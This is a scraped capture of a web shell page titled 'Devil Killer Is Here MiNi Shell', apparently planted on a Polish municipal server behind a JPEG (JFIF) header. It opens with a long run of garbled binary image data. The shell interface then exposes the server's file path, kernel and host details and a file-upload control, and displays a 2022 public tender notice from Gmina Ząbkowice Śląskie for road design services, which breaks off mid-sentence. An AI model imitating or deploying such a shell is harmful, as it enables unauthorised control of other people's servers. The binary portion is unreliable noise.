JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220728/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220728/0028183701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji przebudowy ulic Aliantów, Długiej, Strażackiej, Bohaterów Getta,<br/>Batalionów Chłopskich w Ząbkowicach Śląskich </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ząbkowice Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890718461</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 1 Maja 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ząbkowice Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@zabkowiceslaskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.zabkowiceslaskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji przebudowy ulic Aliantów, Długiej, Strażackiej, Bohaterów Getta,<br/>Batalionów Chłopskich w Ząbkowicach Śląskich </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2cf6004c-0e5d-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00281837</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000862/17/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi inżynieryjne w zakresie projektowania w specjalności drogowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 96/46/WE (ogólne<br/>rozporządzenie o ochronie danych osobowych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, ze zm.)<br/>zwanego dalej RODO, uprzejmie informujemy że:<br/>1. Administratorem danych osobowych jest Gmina Ząbkowice Śląskie, z siedzibą przy ul. 1 Maja 15,<br/>57-200 Ząbkowice Śląskie, NIP 887-16-35-243, REGON 890718461, tel. +48 (74) 816-53-00, email:<br/>urzad@zabkowiceslaskie.pl (dalej Zamawiający, Administrator).<br/>2. W sprawach związanych z Pani/Pana danymi osobowymi należy kontaktować się z Inspektorem<br/>Ochrony Danych, kontakt pisemny za pomocą poczty tradycyjnej na wskazany w poprzednim punkcie<br/>adres, pocztą elektroniczną na adres email: iod@zabkowiceslaskie.pl. Funkcję IOD pełni Tomasz<br/>Trzciałkowski.<br/>3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b) i c) RODO w celu prowadzenia<br/>przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia i wykonania<br/>umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych<br/>procedur udzielania zamówień publicznych spoczywających na Administratorze.<br/>4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych (t.j. Dz.U. z 2021 r. poz. 1129, ze zm.) dalej PZP, a także podmioty, które<br/>przetwarzają dane osobowe w imieniu i na polecenie Administratora.<br/>5. Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Podanie danych osobowych przez osobę, której dane dotyczą jest wymogiem określonym w<br/>przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>Konsekwencje niepodania określonych danych wynikają z ustawy PZP.<br/>7. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosownie do brzmienia art. 22 RODO.<br/>8. Osoba, której dane dotyczą posiada następujące prawa wynikające z przepisów RODO:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych;<br/>b) na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia danych osobowych przy czym<br/>skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z PZP;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z tym jednak zastrzeżeniem, że zgłoszenie żądania nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w trybie i na zasadach<br/>opisanych na stronie Urzędu pod adresem: https://uodo.gov.pl/pl/83/155;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Jednocześnie informujemy, że osobie, której dane dotyczą<br/>nie przysługuje:<br/>a) prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b), d) lub e) RODO;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) prawo sprzeciwu, wobec przetwarzania danych osobowych, o którym mowa w na art. 21 RODO,<br/>gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. b) i c) RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.31.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie kompleksowej dokumentacji projektowej oraz<br/>dokumentacji kosztorysowej i przetargowej dla zadania inwestycyjnego pn.: „Wykonanie<br/>dokumentacji przebudowy ulic Aliantów, Długiej, Strażackiej, Bohaterów Getta, Batalionów<br/>Chłopskich w Ząbkowicach Śląskich” obejmującą przebudowę nw. ulic:<br/>Aliantów, Długiej, Strażackiej, Bohaterów Getta, Batalionów Chłopskich , Plac Marii<br/>Skłodowskiej -Curie, część ul. Krótkiej i część ulicy Słowackiego w Ząbkowicach Śląskich.<br/>Zamówienie obejmujące:<br/>1) wykonania wielobranżowego projektu budowlanego i projektu wykonawczego, dokumentacji<br/>kosztorysowej obejmującej kosztorys inwestorski, przedmiar robót oraz przetargowej<br/>obejmującej specyfikację techniczną wykonania i odbioru robót budowlanych dla wszystkich<br/>branż dla każdej ulicy oddzielnie.<br/>2) opracowania dokumentacji projektowej zgodnie z Rozporządzeniem Ministra Rozwoju z dnia<br/>11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z<br/>2020 r. poz. 1609).); Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w<br/>sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych<br/>wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013<br/>r. poz. 1129 z póź.zm.). Przy opracowaniu dokumentacji projektowej należy uwzględnić wymogi<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r., poz.2351 z póź. zm) wraz z<br/>przepisami wykonawczymi obowiązującymi w tym zakresie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">270 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zmawiający przewiduje możliwość zastawania art. 304 ustawy Pzp. tj. udzielenia<br/>zamówienia w trybie z wolnej ręki w zakresie wszystkich zadań objętych niniejszym postępowaniem<br/>przy spełnieniu warunków, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. Zamówienie może<br/>zostać udzielone w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu<br/>Wykonawcy usług. Zamówienie polegać będzie na powtórzeniu podobnych usług oraz będzie zgodne<br/>przedmiotem zamówienia podstawowego. Opis przedmiotu niniejszego zamówienia oraz projektowane<br/>postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści<br/>pierwotnej umowy (załącznik do SWZ) określają w szczególności jakie usługi Zamawiający przewiduje<br/>do realizacji w ramach powtórzenia podobnych usług. Podstawą do wszczęcia negocjacji będą wartości<br/>szacunkowe ustalone dla zamówień z wolnej ręki określone w podstawowym, pierwotnym zamówieniu.<br/>Całkowita wartość zamówienia uwzględnia również wartość zamówienia ustalona na podstawie art.<br/>214 ust. 1 pkt 7 ustawy Pzp. Wartość podobnych usług: do 100 000,00 złotych netto</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">spełnia/nie spełnia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a) W zakresie zdolności do występowania w obrocie gospodarczym:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający nie precyzuje warunku.<br/>b) W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o<br/>ile wynika to z odrębnych przepisów:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający nie precyzuje warunku.<br/>c) W zakresie sytuacji ekonomicznej lub finansowej:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający nie precyzuje warunku.<br/>d) W zakresie zdolności technicznej lub zawodowej:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>W zakresie zdolności technicznej:<br/>- osoby skierowane do realizacji zamówienia:<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje lub będzie<br/>dysponować osobą lub osobami spełniającymi następujące warunki:<br/>Głównym projektantem - 1 (jedna) osoba posiadająca uprawnienia budowlane do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie w zakresie projektowania o specjalności<br/>inżynieryjnej drogowej bez ograniczeń, w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo<br/>budowlane.<br/>Jednocześnie osoby spełniające powyższy warunek to również osoby, których odpowiednie<br/>kwalifikacje zostały uznane na zasadach określonych w przepisach odrębnych (podstawa<br/>prawna art. 12a ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz.U. z 2020 r., poz. 1333 tj.<br/>z późn. zm.) lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej,<br/>Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym<br/>Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do<br/>wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te<br/>kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 22 grudnia 2015 r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (Dz. U. z 2020 r., poz. 220 tj. z późn. zm.).<br/>Przez doświadczenie zawodowe (w przypadku osób od których wymagane jest posiadanie<br/>uprawnień budowlanych, doświadczenie liczone jest w okresie od daty uzyskania stosownych<br/>uprawnień do daty składania ofert.<br/>Wszystkie wskazane osoby powinny posiadać biegłą znajomość języka polskiego. W przypadku,<br/>gdy wskazane osoby nie posiadają biegłej znajomości języka polskiego Wykonawca jest<br/>zobowiązany zapewnić tłumacza(y) języka polskiego, zapewniającego stałe, biegłe i fachowe<br/>tłumaczenie w kontaktach między Zamawiającym a Wykonawcą, na okres i dla potrzeb realizacji<br/>zamówienia.<br/>Zdolność zawodowa:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich<br/>trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie:<br/>– zrealizował na co najmniej 1 zamówienie na wykonanie usługi polegającej na wykonaniu<br/>kompletnej dokumentacji technicznej budowy, przebudowy lub remontu drogi na obszarze<br/>wpisanym do rejestru zabytków.<br/>Ocena spełnienia ww. warunku udziału w postępowaniu zostanie dokonana<br/>na podstawie przedłożonych przez Wykonawcę oświadczeń, dokumentów wg zasady spełnia/<br/>nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">5) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami – wg wzoru załącznika nr 4 do SWZ;<br/>6) wykazu zamówień wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,<br/>miejsca wykonania oraz podmiotów, na rzecz których zamówienia te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy zostały wykonane one należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>zamówienia były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty – zgodnie z załącznikiem nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawca zobowiązany jest dołączyć do oferty (aktualne na dzień<br/>składania ofert) oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do<br/>wykluczenia z postępowania, o którym mowa w art. 125 ust. 1 ustawy Pzp. – zgodnie z załącznikiem nr<br/>2 do SWZ.<br/>Informacje zawarte w w/w oświadczeniu stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia, wraz z w/w oświadczeniem, także oświadczenie podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, w/w oświadczenie składa<br/>każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>2. Zamawiający działając zgodnie z art. 274 ust. 2 ustawy Pzp, jeśli uzna to za niezbędne do<br/>zapewnienia odpowiedniego przebiegu postępowania, MOŻE wezwać Wykonawców do złożenia:<br/>1) oświadczenia (w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp) o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(Dz. U. z 2020 r. poz. 1076 tj. ze zm.), z innym Wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej – zgodnie z załącznikiem nr 3 do SWZ;<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia umocowania do<br/>działania w imieniu Wykonawcy.<br/>3. Wykonawca, którego oferta została najwyżej oceniona, zobowiązany jest (na wezwanie<br/>Zmawiającego) do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień<br/>ich złożenia):<br/>3) oświadczenia Wykonawcy (w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp.) o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 tj. ze zm.), z innym Wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi 